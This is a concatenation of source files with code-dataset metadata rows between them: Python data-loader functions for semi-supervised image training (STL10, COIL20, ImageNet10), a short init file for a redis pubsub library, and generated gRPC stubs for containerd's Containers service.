print("Find lab_ind!")
save_ind = False
else:
lbl_range = range(10)
for i in lbl_range:
mask[np.where(labels == i)[0][: config.size_labeled_data / 10]] = True
labeled_indices, unlabeled_indices = indices[mask], indices
# labeled_indices, unlabeled_indices = indices[mask], indices[~ mask]
print 'labeled size', labeled_indices.shape[0], 'unlabeled size', unlabeled_indices.shape[0], 'dev size', len(
dev_set)
labeled_loader = DataLoader(config, training_set, labeled_indices, config.train_batch_size)
unlabeled_loader = DataLoader(config, training_set, unlabeled_indices, config.train_batch_size_2)
dev_loader = DataLoader(config, dev_set, dev_indices, config.dev_batch_size)
special_set = []
for i in range(10):
special_set.append(training_set[indices[np.where(labels == i)[0][0]]][0])
special_set = torch.stack(special_set)
# save label indices
ind_path = os.path.join(config.save_dir, '{}.FM+VI.{}.lind.npy'.format(config.dataset, config.suffix))
if save_ind: # save step-1 / non-step inds
np.save(ind_path, labeled_indices)
return labeled_loader, unlabeled_loader, dev_loader, special_set
def get_stl10_loaders_test(config, lab_ind=True):
tr_list = []
if hasattr(config, 'image_side') and config.image_side != 96: # resize
tr_list.append(transforms.Resize(config.image_side))
tr_list += [transforms.ToTensor(), transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))]
# tr_list += [transforms.ToTensor(), transforms.Normalize((0.53, 0.53, 0.52), (0.29, 0.29, 0.28))]
transform = transforms.Compose(tr_list)
training_set = STL10(config.data_root, split='train+unlabeled', download=True, transform=transform)
dev_set = STL10(config.data_root, split='test', download=True, transform=transform)
indices = np.arange(len(training_set))
labels = np.array([training_set[i][1] for i in indices], dtype=np.int64)
dev_indices = np.arange(len(dev_set))
if config.num_label != 10:
assert hasattr(config, 'allowed_label') and config.allowed_label != "", "No allowed_label"
# dev
dev_labels = np.array([dev_set[i][1] for i in dev_indices], dtype=np.int64)
mask3 = np.zeros(dev_indices.shape[0], dtype=np.bool)
mask2 = np.zeros(indices.shape[0], dtype=np.bool)
lbl_range = config.allowed_label.split(",")
lbl_range = [int(i) for i in lbl_range]
for i in lbl_range:
mask2[np.where(labels == i)[0][:]] = True
mask3[np.where(dev_labels == i)[0][:]] = True
indices = indices[mask2]
dev_indices = dev_indices[mask3]
unlabeled_loader = DataLoader(config, training_set, indices, config.train_batch_size_2)
dev_loader = DataLoader(config, dev_set, dev_indices, config.dev_batch_size)
ind_path = os.path.join(config.save_dir, '{}.FM+VI.{}.lind.npy'.format(config.dataset, config.suffix))
if lab_ind and os.path.exists(ind_path):
labeled_indices = np.load(ind_path)
print("Find lab_ind!")
labeled_loader = DataLoader(config, training_set, labeled_indices, config.train_batch_size)
if config.num_label != 10:
# lbl: convert data_ind to unl_ind
mask = np.isin(indices, labeled_indices)
labeled_indices = np.arange(len(indices))
labeled_indices = labeled_indices[mask]
return unlabeled_loader, dev_loader, labeled_loader, labeled_indices
else:
print("no lab_ind!")
return unlabeled_loader, dev_loader
def get_stl10_loaders(config): # n*3*96*96
save_ind = True
tr_list = []
if hasattr(config, 'flip') and config.flip:
tr_list.append(transforms.RandomHorizontalFlip())
if hasattr(config, 'image_side') and config.image_side != 96: # resize
tr_list.append(transforms.Resize(config.image_side))
tr_list += [transforms.ToTensor(), transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))]
# tr_list += [transforms.ToTensor(), transforms.Normalize((0.53, 0.53, 0.52), (0.29, 0.29, 0.28))]
transform = transforms.Compose(tr_list)
tr_list = []
if hasattr(config, 'image_side') and config.image_side != 96: # resize
tr_list.append(transforms.Resize(config.image_side))
tr_list += [transforms.ToTensor(), transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))]
# tr_list += [transforms.ToTensor(), transforms.Normalize((0.53, 0.53, 0.52), (0.29, 0.29, 0.28))]
transform2 = transforms.Compose(tr_list)
training_set = STL10(config.data_root, split='train+unlabeled', download=True, transform=transform)
dev_set = STL10(config.data_root, split='test', download=True, transform=transform2)
indices = np.arange(len(training_set))
np.random.shuffle(indices)
mask = np.zeros(indices.shape[0], dtype=np.bool)
labels = np.array([training_set[i][1] for i in indices], dtype=np.int64)
dev_indices = np.arange(len(dev_set))
if config.num_label != 10:
assert hasattr(config, 'allowed_label') and config.allowed_label != "", "No allowed_label"
# dev
dev_labels = np.array([dev_set[i][1] for i in dev_indices], dtype=np.int64)
mask3 = np.zeros(dev_indices.shape[0], dtype=np.bool)
mask2 = np.zeros(indices.shape[0], dtype=np.bool)
lbl_range = config.allowed_label.split(",")
lbl_range = [int(i) for i in lbl_range]
for i in lbl_range:
mask[np.where(labels == i)[0][: config.size_labeled_data / config.num_label]] = True
mask2[np.where(labels == i)[0][:]] = True
mask3[np.where(dev_labels == i)[0][:]] = True
labeled_indices, unlabeled_indices = indices[mask], indices[mask2]
dev_indices = dev_indices[mask3]
ind_path = os.path.join(config.save_dir, '{}.FM+VI.{}.lind.npy'.format(config.dataset, config.suffix))
if os.path.exists(ind_path) or \
(hasattr(config, "train_step") and config.train_step != 1): # try to load step 1 inds
assert os.path.exists(ind_path), "step {} Unknown label inds".format(config.train_step)
labeled_indices = np.load(ind_path)
print("Find lab_ind!")
save_ind = False
else:
lbl_range = range(10)
for i in lbl_range:
mask[np.where(labels == i)[0][: config.size_labeled_data / 10]] = True
labeled_indices, unlabeled_indices = indices[mask], indices
# labeled_indices, unlabeled_indices = indices[mask], indices[~ mask]
print 'labeled size', labeled_indices.shape[0], 'unlabeled size', unlabeled_indices.shape[0], 'dev size', len(
dev_set)
labeled_loader = DataLoader(config, training_set, labeled_indices, config.train_batch_size)
unlabeled_loader = DataLoader(config, training_set, unlabeled_indices, config.train_batch_size_2)
dev_loader = DataLoader(config, dev_set, dev_indices, config.dev_batch_size)
special_set = []
for i in range(10):
special_set.append(training_set[indices[np.where(labels == i)[0][0]]][0])
special_set = torch.stack(special_set)
# save label indices
ind_path = os.path.join(config.save_dir, '{}.FM+VI.{}.lind.npy'.format(config.dataset, config.suffix))
if save_ind: # save step-1 / non-step inds
np.save(ind_path, labeled_indices)
return labeled_loader, unlabeled_loader, dev_loader, special_set
def get_coil20_loaders_test(config, lab_ind=True):
tr_list = []
tr_list += [transforms.ToTensor(), transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))]
# tr_list += [transforms.ToTensor(), transforms.Normalize((0.53, 0.53, 0.52), (0.29, 0.29, 0.28))]
transform = transforms.Compose(tr_list)
all_set = coil20(config.data_root, download=True, transform=transform, img_side=config.image_side)
num_data = len(all_set)
indices = np.arange(num_data)
labels = np.array([all_set[i][1] for i in indices], dtype=np.int64)
mask2 = np.zeros(indices.shape[0], dtype=np.bool)
if hasattr(config, 'allowed_label') and config.allowed_label != "":
lbl_range = config.allowed_label.split(",")
lbl_range = [int(i) for i in lbl_range]
for i in lbl_range:
mask2[np.where(labels == i)[0][:]] = True
indices = indices[mask2]
unlabeled_loader = DataLoader(config, all_set, indices, config.train_batch_size_2)
lind_path = os.path.join(config.save_dir, '{}.FM+VI.{}.lind.npy'.format(config.dataset, config.suffix))
uind_path = os.path.join(config.save_dir, '{}.FM+VI.{}.uind.npy'.format(config.dataset, config.suffix))
if lab_ind and os.path.exists(lind_path):
assert os.path.exists(uind_path), "uind does not exist"
labeled_indices = np.load(lind_path)
unlabeled_indices = np.load(uind_path)
print("Find lab_ind!")
labeled_loader = DataLoader(config, all_set, labeled_indices, config.train_batch_size)
unlabeled_loader = DataLoader(config, all_set, unlabeled_indices, config.train_batch_size)
# lbl: convert data_ind to unl_ind
mask = np.isin(indices, labeled_indices)
labeled_indices = np.arange(len(indices))
labeled_indices = labeled_indices[mask]
mask3 = np.isin(indices, unlabeled_indices)
mask3 = ~mask3
dev_indices = indices[mask3]
dev_loader = DataLoader(config, all_set, dev_indices, config.dev_batch_size)
return unlabeled_loader, dev_loader, labeled_loader, labeled_indices
else:
print("no lab_ind!")
return unlabeled_loader, unlabeled_loader
def get_coil20_loaders(config): # n*1*128*128
save_ind = True
tr_list = []
if hasattr(config, 'flip') and config.flip:
tr_list.append(transforms.RandomHorizontalFlip())
tr_list += [transforms.ToTensor(), transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))]
# tr_list += [transforms.ToTensor(), transforms.Normalize((0.53, 0.53, 0.52), (0.29, 0.29, 0.28))]
transform = transforms.Compose(tr_list)
all_set = coil20(config.data_root, download=True, transform=transform, img_side=config.image_side)
# dev ratio:1040/1440; lab ratio: 20/1440
# ref: https://github.com/csyanbin/Semi-supervised_Neural_Network/blob/master/utils/coil_data.py
num_data = len(all_set)
indices = np.arange(num_data)
np.random.shuffle(indices)
labels = np.array([all_set[i][1] for i in indices], dtype=np.int64)
assert hasattr(config,
'size_unlabeled_data') and config.size_unlabeled_data <= num_data, "size_unlabeled_data too large"
lind_path = os.path.join(config.save_dir, '{}.FM+VI.{}.lind.npy'.format(config.dataset, config.suffix))
uind_path = os.path.join(config.save_dir, '{}.FM+VI.{}.uind.npy'.format(config.dataset, config.suffix))
if os.path.exists(lind_path) or \
(hasattr(config, "train_step")
and config.train_step != 1): # try to load step 1 inds
assert os.path.exists(lind_path) and os.path.exists(uind_path), "step {} Unknown label inds".format(
config.train_step)
labeled_indices = np.load(lind_path)
unlabeled_indices = np.load(uind_path)
# dev data, part labels or not
mask3 = np.zeros(num_data, dtype=np.bool)
if hasattr(config, 'allowed_label') and config.allowed_label != "":
lbl_range = config.allowed_label.split(",")
lbl_range = [int(i) for i in lbl_range]
else:
lbl_range = range(20)
for i in lbl_range:
mask3[np.where(labels == i)[0][:]] = True
indices = indices[mask3]
mask3 = np.isin(indices, unlabeled_indices)
mask3 = ~mask3
dev_indices = indices[mask3]
print("Find lab_ind!")
save_ind = False
else:
mask = np.zeros(num_data, dtype=np.bool)
mask2 = np.zeros(num_data, dtype=np.bool)
mask3 = np.zeros(num_data, dtype=np.bool)
if hasattr(config, 'allowed_label') and config.allowed_label != "":
lbl_range = config.allowed_label.split(",")
lbl_range = [int(i) for i in lbl_range]
else:
lbl_range = range(20)
for i in lbl_range:
mask[np.where(labels == i)[0][: config.size_labeled_data // config.num_label]] = True
mask2[np.where(labels == i)[0][:config.size_unlabeled_data // config.num_label]] = True
mask3[np.where(labels == i)[0][config.size_unlabeled_data // config.num_label:]] = True
labeled_indices, unlabeled_indices = indices[mask], indices[mask2]
dev_indices = indices[mask3]
print 'labeled size', labeled_indices.shape[0], 'unlabeled size', unlabeled_indices.shape[0], \
'dev size', dev_indices.shape[0]
labeled_loader = DataLoader(config, all_set, labeled_indices, config.train_batch_size)
unlabeled_loader = DataLoader(config, all_set, unlabeled_indices, config.train_batch_size_2)
dev_loader = DataLoader(config, all_set, dev_indices, config.dev_batch_size)
special_set = []
for i in range(10):
special_set.append(all_set[indices[np.where(labels == i)[0][0]]][0])
special_set = torch.stack(special_set)
# save label indices
if save_ind: # save step-1 / non-step inds
np.save(lind_path, labeled_indices)
np.save(uind_path, unlabeled_indices)
return labeled_loader, unlabeled_loader, dev_loader, special_set
def get_imagenet10_loaders_test(config, lab_ind=True):
tr_list = []
tr_list += [transforms.ToTensor(), transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))]
# tr_list += [transforms.ToTensor(), transforms.Normalize((0.53, 0.53, 0.52), (0.29, 0.29, 0.28))]
transform = transforms.Compose(tr_list)
train_set = imagenet10(config.data_root, splitpart='train') # untested
test_set = imagenet10(config.data_root, splitpart='val') # untested
num_data = len(train_set)
indices = np.arange(num_data)
labels = np.array([train_set[i][1] for i in indices], dtype=np.int64)
mask2 = np.zeros(indices.shape[0], dtype=np.bool)
if hasattr(config, 'allowed_label') and config.allowed_label != "":
lbl_range = config.allowed_label.split(",")
lbl_range = [int(i) for i in lbl_range]
else:
lbl_range = np.arange(1000)
np.random.shuffle(lbl_range)
lbl_range = lbl_range[:config.num_label]
for i in lbl_range:
mask2[np.where(labels == i)[0][:]] = True
indices = indices[mask2]
unlabeled_loader = DataBatchLoader(config, train_set, indices, config.train_batch_size_2,
transform=transform, img_side=config.image_side)
lind_path = os.path.join(config.save_dir, '{}.FM+VI.{}.lind.npy'.format(config.dataset, config.suffix))
uind_path = os.path.join(config.save_dir, '{}.FM+VI.{}.uind.npy'.format(config.dataset, config.suffix))
tind_path = os.path.join(config.save_dir, '{}.FM+VI.{}.tind.npy'.format(config.dataset, config.suffix))
if lab_ind and os.path.exists(lind_path):
assert os.path.exists(uind_path), "uind does not exist"
labeled_indices = np.load(lind_path)
unlabeled_indices = np.load(uind_path)
dev_indices = np.load(tind_path)
print("Find lab_ind!")
labeled_loader = DataBatchLoader(config, train_set, labeled_indices, config.train_batch_size,
transform=transform, img_side=config.image_side)
unlabeled_loader = DataBatchLoader(config, train_set, unlabeled_indices, config.train_batch_size,
transform=transform, img_side=config.image_side)
dev_loader = DataBatchLoader(config, test_set, dev_indices, config.dev_batch_size,
transform=transform, img_side=config.image_side)
return unlabeled_loader, dev_loader, labeled_loader, labeled_indices
else:
print("no lab_ind!")
return unlabeled_loader, unlabeled_loader
def get_imagenet10_loaders(config): # n*1*128*128
save_ind = True
tr_list = []
if hasattr(config, 'flip') and config.flip:
tr_list.append(transforms.RandomHorizontalFlip())
tr_list += [transforms.ToTensor(), transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))]
# tr_list += [transforms.ToTensor(), transforms.Normalize((0.53, 0.53, 0.52), (0.29, 0.29, 0.28))]
transform = transforms.Compose(tr_list)
train_set = imagenet10(config.data_root, splitpart='train') # untested
test_set = imagenet10(config.data_root, splitpart='val') # untested
# 1000 cls
# train: 1,281,167, val: 50,000, test: 100,000, but no cls on test
num_data = len(train_set)
num_data2 = len(test_set)
indices = np.arange(num_data)
indices2 = np.arange(num_data2)
np.random.shuffle(indices)
labels = np.array([train_set[i][1] for i in indices], dtype=np.int64)
labels2 = np.array([test_set[i][1] for i in indices2], dtype=np.int64)
lind_path = os.path.join(config.save_dir, '{}.FM+VI.{}.lind.npy'.format(config.dataset, config.suffix))
uind_path = os.path.join(config.save_dir, '{}.FM+VI.{}.uind.npy'.format(config.dataset, config.suffix))
tind_path = os.path.join(config.save_dir, '{}.FM+VI.{}.tind.npy'.format(config.dataset, config.suffix))
if os.path.exists(lind_path) or \
(hasattr(config, "train_step")
and config.train_step != 1): # try to load step 1 inds
assert os.path.exists(lind_path) and os.path.exists(uind_path), "step {} Unknown label inds".format(
config.train_step)
labeled_indices = np.load(lind_path)
unlabeled_indices = np.load(uind_path)
dev_indices = np.load(tind_path)
print("Find lab_ind!")
save_ind = False
else:
mask = np.zeros(num_data, dtype=np.bool)
mask2 = np.zeros(num_data, dtype=np.bool)
mask3 = np.zeros(num_data2, dtype=np.bool)
if hasattr(config, 'allowed_label') and config.allowed_label != "":
lbl_range = config.allowed_label.split(",")
lbl_range = [int(i) for i in lbl_range]
else:
lbl_range = np.arange(1000)
np.random.shuffle(lbl_range)
lbl_range = lbl_range[:config.num_label]
# the amount in a class: [732, 1300]; there are less than 1300 images in 104 classes.
min_num = 1301
for i in lbl_range:
mask[np.where(labels == i)[0][: config.size_labeled_data // config.num_label]] = True
mask3[np.where(labels2 == i)[0][:]] = True
min_num = min(min_num, np.where(labels == i)[0].shape[0])
for i in lbl_range:
mask2[np.where(labels == i)[0][:min_num]] = True
labeled_indices, unlabeled_indices = indices[mask], indices[mask2]
dev_indices = indices2[mask3]
print 'labeled size', labeled_indices.shape[0], 'unlabeled size', unlabeled_indices.shape[0], \
'dev size', dev_indices.shape[0]
labeled_loader = DataBatchLoader(config, train_set, labeled_indices, config.train_batch_size,
transform=transform, img_side=config.image_side)
unlabeled_loader = DataBatchLoader(config, train_set, unlabeled_indices, config.train_batch_size_2,
transform=transform, img_side=config.image_side)
dev_loader = DataBatchLoader(config, test_set, dev_indices, config.dev_batch_size,
transform=transform, img_side=config.image_side)
special_set = []
# save label indices
if save_ind: # save step-1 / non-step inds
np.save(lind_path, labeled_indices)
np.save(uind_path, unlabeled_indices)
np.save(tind_path, dev_indices)
return labeled_loader, unlabeled_loader, dev_loader, special_set
def get_data_loaders_test(config):
dataset = config.dataset
if dataset == 'cifar':
return get_cifar_loaders_test(config)
elif dataset == 'stl10':
return get_stl10_loaders_test(config)
elif dataset == 'coil20':
return get_coil20_loaders_test(config)
elif dataset == 'imagenet10':
return get_imagenet10_loaders_test(config)
else:
print("dataset wrong: {}".format(dataset))
def get_data_loaders(config):
dataset = config.dataset
if dataset == 'cifar':
return get_cifar_loaders(config)
elif dataset == 'stl10':
return get_stl10_loaders(config)
elif dataset == 'coil20':
return get_coil20_loaders(config)
elif dataset == 'imagenet10':
return get_imagenet10_loaders(config)
else:
print("dataset wrong: {}".format(dataset))
| 43.862106 | 117 | 0.637721 | 5,482 | 40,397 | 4.516782 | 0.067858 | 0.005331 | 0.006664 | 0.008885 | 0.843746 | 0.830217 | 0.819111 | 0.803118 | 0.776463 | 0.766165 | 0 | 0.029029 | 0.235092 | 40,397 | 920 | 118 | 43.909783 | 0.772298 | 0.068718 | 0 | 0.725105 | 0 | 0.001403 | 0.045754 | 0.000862 | 0 | 0 | 0 | 0.001087 | 0.015428 | 0 | null | null | 0.001403 | 0.015428 | null | null | 0.032258 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
5d15b3b0a0bc337bc5ef4c187aa1e321b334d640 | 262 | py | Python | dionysus/__init__.py | Joshua3212/Dionysus | 2560a5afb7a00ad4ed8ead4c2aedf9b06b735195 | [
"MIT"
] | 1 | 2022-01-16T12:14:07.000Z | 2022-01-16T12:14:07.000Z | dionysus/__init__.py | Joshua3212/dionysus | 2560a5afb7a00ad4ed8ead4c2aedf9b06b735195 | [
"MIT"
] | null | null | null | dionysus/__init__.py | Joshua3212/dionysus | 2560a5afb7a00ad4ed8ead4c2aedf9b06b735195 | [
"MIT"
] | null | null | null | """
Tiny framework for interacting with redis pubsub and other protocols using custom adapters
"""
__version__ = "0.1.1"
__author__ = "Joshua3212"
__description__ = "Tiny framework for interacting with redis pubsub and other protocols using custom adapters" | 37.428571 | 110 | 0.782443 | 33 | 262 | 5.848485 | 0.575758 | 0.134715 | 0.165803 | 0.279793 | 0.80829 | 0.80829 | 0.80829 | 0.80829 | 0.80829 | 0.80829 | 0 | 0.031532 | 0.152672 | 262 | 7 | 110 | 37.428571 | 0.837838 | 0.343511 | 0 | 0 | 0 | 0 | 0.652174 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
5d22168b7320f128ab3e8ff92c557132f3281756 | 14,402 | py | Python | api_1.4/containerd/services/containers/v1/containers_pb2_grpc.py | englandbaron/pycontainerd | 9e5fea6e182a80508ce8b5725f407e50beba3cfe | [
"Apache-2.0"
] | null | null | null | api_1.4/containerd/services/containers/v1/containers_pb2_grpc.py | englandbaron/pycontainerd | 9e5fea6e182a80508ce8b5725f407e50beba3cfe | [
"Apache-2.0"
] | null | null | null | api_1.4/containerd/services/containers/v1/containers_pb2_grpc.py | englandbaron/pycontainerd | 9e5fea6e182a80508ce8b5725f407e50beba3cfe | [
"Apache-2.0"
] | null | null | null | # Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from containerd.services.containers.v1 import containers_pb2 as containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
class ContainersStub(object):
"""Containers provides metadata storage for containers used in the execution
service.
The objects here provide an state-independent view of containers for use in
management and resource pinning. From that perspective, containers do not
have a "state" but rather this is the set of resources that will be
considered in use by the container.
From the perspective of the execution service, these objects represent the
base parameters for creating a container process.
In general, when looking to add fields for this type, first ask yourself
whether or not the function of the field has to do with runtime execution or
is invariant of the runtime state of the container. If it has to do with
runtime, or changes as the "container" is started and stops, it probably
doesn't belong on this object.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.Get = channel.unary_unary(
'/containerd.services.containers.v1.Containers/Get',
request_serializer=containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.GetContainerRequest.SerializeToString,
response_deserializer=containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.GetContainerResponse.FromString,
)
self.List = channel.unary_unary(
'/containerd.services.containers.v1.Containers/List',
request_serializer=containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.ListContainersRequest.SerializeToString,
response_deserializer=containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.ListContainersResponse.FromString,
)
self.ListStream = channel.unary_stream(
'/containerd.services.containers.v1.Containers/ListStream',
request_serializer=containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.ListContainersRequest.SerializeToString,
response_deserializer=containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.ListContainerMessage.FromString,
)
self.Create = channel.unary_unary(
'/containerd.services.containers.v1.Containers/Create',
request_serializer=containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.CreateContainerRequest.SerializeToString,
response_deserializer=containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.CreateContainerResponse.FromString,
)
self.Update = channel.unary_unary(
'/containerd.services.containers.v1.Containers/Update',
request_serializer=containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.UpdateContainerRequest.SerializeToString,
response_deserializer=containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.UpdateContainerResponse.FromString,
)
self.Delete = channel.unary_unary(
'/containerd.services.containers.v1.Containers/Delete',
request_serializer=containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.DeleteContainerRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
class ContainersServicer(object):
"""Containers provides metadata storage for containers used in the execution
service.
The objects here provide an state-independent view of containers for use in
management and resource pinning. From that perspective, containers do not
have a "state" but rather this is the set of resources that will be
considered in use by the container.
From the perspective of the execution service, these objects represent the
base parameters for creating a container process.
In general, when looking to add fields for this type, first ask yourself
whether or not the function of the field has to do with runtime execution or
is invariant of the runtime state of the container. If it has to do with
runtime, or changes as the "container" is started and stops, it probably
doesn't belong on this object.
"""
def Get(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def List(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListStream(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Create(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Update(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Delete(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_ContainersServicer_to_server(servicer, server):
rpc_method_handlers = {
'Get': grpc.unary_unary_rpc_method_handler(
servicer.Get,
request_deserializer=containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.GetContainerRequest.FromString,
response_serializer=containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.GetContainerResponse.SerializeToString,
),
'List': grpc.unary_unary_rpc_method_handler(
servicer.List,
request_deserializer=containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.ListContainersRequest.FromString,
response_serializer=containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.ListContainersResponse.SerializeToString,
),
'ListStream': grpc.unary_stream_rpc_method_handler(
servicer.ListStream,
request_deserializer=containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.ListContainersRequest.FromString,
response_serializer=containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.ListContainerMessage.SerializeToString,
),
'Create': grpc.unary_unary_rpc_method_handler(
servicer.Create,
request_deserializer=containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.CreateContainerRequest.FromString,
response_serializer=containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.CreateContainerResponse.SerializeToString,
),
'Update': grpc.unary_unary_rpc_method_handler(
servicer.Update,
request_deserializer=containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.UpdateContainerRequest.FromString,
response_serializer=containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.UpdateContainerResponse.SerializeToString,
),
'Delete': grpc.unary_unary_rpc_method_handler(
servicer.Delete,
request_deserializer=containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.DeleteContainerRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'containerd.services.containers.v1.Containers', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class Containers(object):
"""Containers provides metadata storage for containers used in the execution
service.
The objects here provide an state-independent view of containers for use in
management and resource pinning. From that perspective, containers do not
have a "state" but rather this is the set of resources that will be
considered in use by the container.
From the perspective of the execution service, these objects represent the
base parameters for creating a container process.
In general, when looking to add fields for this type, first ask yourself
whether or not the function of the field has to do with runtime execution or
is invariant of the runtime state of the container. If it has to do with
runtime, or changes as the "container" is started and stops, it probably
doesn't belong on this object.
"""
@staticmethod
def Get(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/containerd.services.containers.v1.Containers/Get',
containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.GetContainerRequest.SerializeToString,
containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.GetContainerResponse.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def List(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/containerd.services.containers.v1.Containers/List',
containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.ListContainersRequest.SerializeToString,
containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.ListContainersResponse.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ListStream(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_stream(request, target, '/containerd.services.containers.v1.Containers/ListStream',
containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.ListContainersRequest.SerializeToString,
containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.ListContainerMessage.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Create(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/containerd.services.containers.v1.Containers/Create',
containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.CreateContainerRequest.SerializeToString,
containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.CreateContainerResponse.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Update(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/containerd.services.containers.v1.Containers/Update',
containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.UpdateContainerRequest.SerializeToString,
containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.UpdateContainerResponse.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Delete(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/containerd.services.containers.v1.Containers/Delete',
containerd_dot_services_dot_containers_dot_v1_dot_containers__pb2.DeleteContainerRequest.SerializeToString,
google_dot_protobuf_dot_empty__pb2.Empty.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
